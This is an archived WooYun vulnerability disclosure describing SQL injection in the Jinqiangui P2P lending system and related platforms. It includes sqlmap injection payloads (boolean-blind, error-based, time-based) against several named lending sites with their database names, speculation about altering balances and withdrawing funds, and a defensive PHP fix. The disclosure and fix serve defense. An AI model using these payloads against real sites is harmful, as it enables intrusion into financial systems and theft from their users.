
Vulnerability summary

Defect ID: wooyun-2015-0126127

Title: SQL injection in the Jinqiangui (金钱柜) P2P lending system and similar systems (affects a large number of P2P lending sites)

Vendor: 金钱柜网贷 (Jinqiangui P2P lending)

Author: 路人甲

Submitted: 2015-07-15 10:23

Fixed: 2015-10-15 17:08

Published: 2015-10-15 17:08

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-15: Details sent to the vendor; awaiting vendor response
2015-07-17: Vendor confirmed; details disclosed to the vendor only
2015-07-20: Details opened to third-party security partners
2015-09-10: Details opened to core white hats and domain experts
2015-09-20: Details opened to regular white hats
2015-09-30: Details opened to intern white hats
2015-10-15: Details opened to the public

Brief description:

A large number of P2P lending systems have an SQL injection vulnerability, on sites ranging from a few million to over a hundred million in total investment. Could the back-end balance data be modified and then withdrawn? Could someone log in to another user's account and withdraw funds? The impact is easy to imagine.

Detailed description:

First, a list of the lending platforms I found:

URL format: http://domain/hetong/<digits>/a<digits>.html


Systems involved: jqg (金钱柜), yyd (unknown), deayou (帝友), hlwd (unknown).
They are presumably all built on the same underlying program.

Proof of vulnerability:

http://chengyuecaifu.com
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://chengyuecaifu.com:80/hetong/11432029595/a298 AND 4698=4698.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://chengyuecaifu.com:80/hetong/11432029595/a298 AND (SELECT 1973 FROM(SELECT COUNT(*),CONCAT(0x7171756371,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716c736471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://chengyuecaifu.com:80/hetong/11432029595/a298 AND SLEEP(30).html
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL 5.0
Database: jqg2
[391 tables]
http://wangdai168.com
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://wangdai168.com:80/hetong/11415843232/a207 AND 4275=4275.html
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: http://wangdai168.com:80/hetong/11415843232/a207 AND EXTRACTVALUE(4454,CONCAT(0x5c,0x71727a6b71,(SELECT (CASE WHEN (4454=4454) THEN 1 ELSE 0 END)),0x7176797871)).html
---
web server operating system: Windows
web application technology: Apache 2.4.10, PHP 5.2.17
back-end DBMS: MySQL 5.1
available databases [1]:
[*] wa3f2njgj7dai16h83d
http://www.kkkdai.com
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.kkkdai.com:80/hetong/31411614799/a266 AND 8136=8136.html
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.kkkdai.com:80/hetong/31411614799/a266 AND 8136=8136.html
---
web application technology: Apache
back-end DBMS: MySQL 5
available databases [1]:
[*] bdm0360063_db


The servers all run on Aliyun, or have SafeDog installed, so the tables are not easy to dump.

Fix:

Filter the input.
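One concrete form of the filtering recommended above, as an added example and not the vendor's code: the two numeric URI segments that sqlmap injected into (the /hetong/<digits>/a<digits>.html path) are checked against a strict digits-only pattern, and the values that pass are bound through a PDO prepared statement rather than concatenated into SQL. The table and column names (jqg_borrow, id, article_id, title) and the database credentials are assumptions; the code is kept compatible with the PHP 5.x versions fingerprinted in the sqlmap output.

```php
<?php
// Added example, not the vendor's code: hardened handler for the
// /hetong/<digits>/a<digits>.html route that sqlmap injected into.
// Table/column names (jqg_borrow, id, article_id, title) and the DB
// credentials are hypothetical. Written for PHP 5.x (no typed signatures).

// Strict allow-list parse of the path: both segments must be digits only,
// so "/hetong/11432029595/a298 AND SLEEP(30).html" is rejected here and
// never reaches the database. Returns array(contract, article) or null.
function parseHetongPath($path)
{
    if (!preg_match('#^/hetong/(\d{1,20})/a(\d{1,10})\.html\z#', $path, $m)) {
        return null;
    }
    // Contract ids in the report run to 14 digits; keep them as a string so
    // they survive 32-bit PHP builds. MySQL compares them numerically.
    return array('contract' => $m[1], 'article' => (int) $m[2]);
}

// Load the record with a prepared statement: the ids are bound as data,
// never concatenated into the SQL text.
function loadContract(PDO $db, array $ids)
{
    $sql  = 'SELECT id, title FROM jqg_borrow WHERE id = :contract AND article_id = :article';
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':contract', $ids['contract'], PDO::PARAM_STR);
    $stmt->bindValue(':article',  $ids['article'],  PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Real server-side prepares (with emulation on, PDO only escapes client-side),
// and errors surface as exceptions instead of silent failures.
$db = new PDO('mysql:host=127.0.0.1;dbname=jqg2', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', array(
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
));

$path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$ids  = parseHetongPath(is_string($path) ? $path : '');
if ($ids === null) {
    header('HTTP/1.1 404 Not Found');   // malformed or tampered path
    exit;
}
$contract = loadContract($db, $ids);
echo $contract === null ? 'Not found' : htmlspecialchars($contract['title'], ENT_QUOTES, 'UTF-8');
```

Against the paths quoted in the sqlmap output above, only the clean form (for example /hetong/11432029595/a298.html) passes the parse; the boolean-, error- and time-based variants all fail the digits-only check and never produce a query.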

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-07-17 17:06

Vendor reply:

CNVD has confirmed the vulnerability as described. No direct handling channel with the software vendor or the site operators has been established yet; the case is pending claim.

Latest status:

None